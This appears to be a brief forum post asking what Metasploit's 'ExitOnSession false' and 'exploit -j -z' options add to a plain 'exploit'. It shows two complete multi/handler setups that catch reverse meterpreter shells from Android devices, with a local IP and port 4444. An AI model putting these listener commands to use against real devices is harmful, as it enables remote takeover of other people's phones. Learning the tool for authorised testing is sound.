Is there anyplace that explains all the unique anad extended commands in metesploit?
for example why would i use "set ExitOnSession false" and "exploit -j -z"
instead of just exploit for the last line????

example
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.130
set LPORT 4444
set ExitOnSession false ???
exploit -j -z ???

my way
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.130
set LPORT 4444
exploit